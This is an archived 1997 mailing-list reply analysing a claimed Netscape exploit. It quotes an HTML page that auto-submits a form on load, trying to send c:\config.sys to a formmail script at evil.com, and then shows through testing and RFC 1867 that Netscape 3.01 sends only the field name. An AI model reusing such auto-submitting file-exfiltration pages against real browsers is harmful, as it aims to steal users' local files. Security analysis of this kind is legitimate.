Re: Netscape Exploit

Roger Espel Llima (espel@LLAIC.UNIV-BPCLERMONT.FR)
Sun, 15 Jun 1997 00:16:45 +0200

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Joe Traister: "Re: Changing default UMASK for all daemons"
Previous message: root: "Netscape Exploit"
Maybe in reply to: root: "Netscape Exploit"
Next in thread: Micah Brandon: "Re: Netscape Exploit"

On Sat, Jun 14, 1997 at 07:21:30PM -0500, root wrote:
> Here is a sample it isn't complete but you get the basic idea of what is
> going on

> <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
>
> <BODY onLoad="daForm.submit()">

That should be "document.daForm.submit()".

> <FORM
> NAME="daForm"
> ACTION="http://evil.com/cgi-bin/formmail.pl"
> METHOD=POST>
>
> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> Harddrive">
> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">

It doesn't seem to be this simple; with this fragment, Netscape never
sends the file's contents, but only the words "Save this document in
your hard drive" as well as the selected file's name, all in an
url-encoded POST request. The file's contents aren't sent at all.

I tried to do something similar, with inputs of type "file" and given
default "value" values, and Netscape (3.01) has been consistently
ignoring them.

Here's what the server gets, with this:

POST / HTTP/1.0
Referer: file:/path/to/attempted/exploit.html
Connection: Keep-Alive
User-Agent: Mozilla/3.01 (X11; I; SunOS 4.1.3_U1 sun4m)
Host: localhost:7777
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-type: application/x-www-form-urlencoded
Content-length: 72

Save+This+Document+on+your%0AHarddrive=&recipient=foo@bar.org

Adding the attribute ENCTYPE="multiplart/form-data" doesn't seem to
help, either; it just changes the format. I haven't had any luck either
with changing the value of document.daForm.save_this_... from
javascript.

RFC 1867 about the form-based file upload in HTML has these security
considerations:

| 8. Security Considerations
|
| It is important that a user agent not send any file that the user has
| not explicitly asked to be sent. Thus, HTML interpreting agents are
| expected to confirm any default file names that might be suggested
| with <INPUT TYPE=file VALUE="yyyy">. Never have any hidden fields be
| able to specify any file.

and Netscape navigator (3.01) seems to follow them... I'm willing to
believe that there's a bug somewhere around there, but it's not that
simple.

Roger

--
e-mail: espel@llaic.univ-bpclermont.fr, espel@unix.bigots.org
WWW page & PGP key: http://www.eleves.ens.fr:8080/home/espel/index.html

Next message: Joe Traister: "Re: Changing default UMASK for all daemons"
Previous message: root: "Netscape Exploit"
Maybe in reply to: root: "Netscape Exploit"
Next in thread: Micah Brandon: "Re: Netscape Exploit"